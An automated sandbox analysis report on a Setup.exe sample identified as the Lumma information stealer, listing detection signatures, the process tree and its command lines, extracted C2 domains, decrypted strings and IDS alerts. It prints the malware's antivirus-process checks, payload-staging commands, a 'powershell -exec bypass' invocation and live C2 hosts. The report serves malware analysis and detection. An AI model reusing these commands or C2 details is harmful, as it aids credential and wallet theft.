Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1579539
MD5:7a2ed58357c7dc7a63754e88af43a860
SHA1:632930cbe696ee75e3445835258c77e8d27ab426
SHA256:984d3e2de76f512c364247b280180d5bd7ed45b4d0c483e10a041943e08730d4
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Setup.exe (PID: 4564 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 7A2ED58357C7DC7A63754E88AF43A860)
    • cmd.exe (PID: 6800 cmdline: "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6688 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5364 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 2296 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3060 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6204 cmdline: cmd /c md 124531 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 5148 cmdline: extrac32 /Y /E Lt MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2836 cmdline: findstr /V "Heater" Lance MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1476 cmdline: cmd /c copy /b ..\Needs + ..\Conclusion + ..\Rendered + ..\French + ..\Selected + ..\Hormone + ..\Rough z MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Designing.com (PID: 6380 cmdline: Designing.com z MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 4676 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f638cc2ab095e5f</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 5508 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["energyaffai.lat", "necklacebudi.lat", "quantitypitt.click", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "hRjzG3--VIKA"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000C.00000003.2535381458.000000000419E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Designing.com PID: 6380JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: Designing.com PID: 6380JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries

                System Summary

                barindex
                Source: Process startedAuthor: Nikita Nazarov, oscd.community: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
                Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="BXbnWZevLkHtdOsp9HK3kFhiUmjhb_D.556JPjN0VJs-1734906557-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Physical Physical.cmd & Physical.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6800, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3060, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:28:44.992703+010020283713Unknown Traffic192.168.2.549760172.67.186.189443TCP
                2024-12-22T23:28:46.999528+010020283713Unknown Traffic192.168.2.549766172.67.186.189443TCP
                2024-12-22T23:28:49.412750+010020283713Unknown Traffic192.168.2.549775172.67.186.189443TCP
                2024-12-22T23:28:51.931764+010020283713Unknown Traffic192.168.2.549782172.67.186.189443TCP
                2024-12-22T23:28:54.195683+010020283713Unknown Traffic192.168.2.549788172.67.186.189443TCP
                2024-12-22T23:28:56.669995+010020283713Unknown Traffic192.168.2.549794172.67.186.189443TCP
                2024-12-22T23:28:58.952601+010020283713Unknown Traffic192.168.2.549799172.67.186.189443TCP
                2024-12-22T23:29:01.468180+010020283713Unknown Traffic192.168.2.549805172.67.186.189443TCP
                2024-12-22T23:29:05.112090+010020283713Unknown Traffic192.168.2.549816172.67.186.189443TCP
                2024-12-22T23:29:11.147526+010020283713Unknown Traffic192.168.2.549823194.58.112.174443TCP
                2024-12-22T23:29:17.590806+010020283713Unknown Traffic192.168.2.549846172.67.191.144443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:28:45.767273+010020546531A Network Trojan was detected192.168.2.549760172.67.186.189443TCP
                2024-12-22T23:28:47.780519+010020546531A Network Trojan was detected192.168.2.549766172.67.186.189443TCP
                2024-12-22T23:29:05.877554+010020546531A Network Trojan was detected192.168.2.549816172.67.186.189443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:28:45.767273+010020498361A Network Trojan was detected192.168.2.549760172.67.186.189443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:28:47.780519+010020498121A Network Trojan was detected192.168.2.549766172.67.186.189443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:28:50.654793+010020480941Malware Command and Control Activity Detected192.168.2.549775172.67.186.189443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-22T23:29:01.474167+010028438641A Network Trojan was detected192.168.2.549805172.67.186.189443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "quantitypitt.click", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "hRjzG3--VIKA"}
                Source: Setup.exeVirustotal: Detection: 7%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.3% probability
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: energyaffai.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: discokeyus.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: grannyejh.lat
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: quantitypitt.click
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmpString decryptor: hRjzG3--VIKA
                Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49788 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49805 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49816 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.5:49846 version: TLS 1.2
                Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00E0DC54
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A087
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E1A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_00E1A1E2
                Source: C:\Users\user\AppData\Local\Temp\124531\Designing.comCode function: 12_2_00E0E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_00E0E472
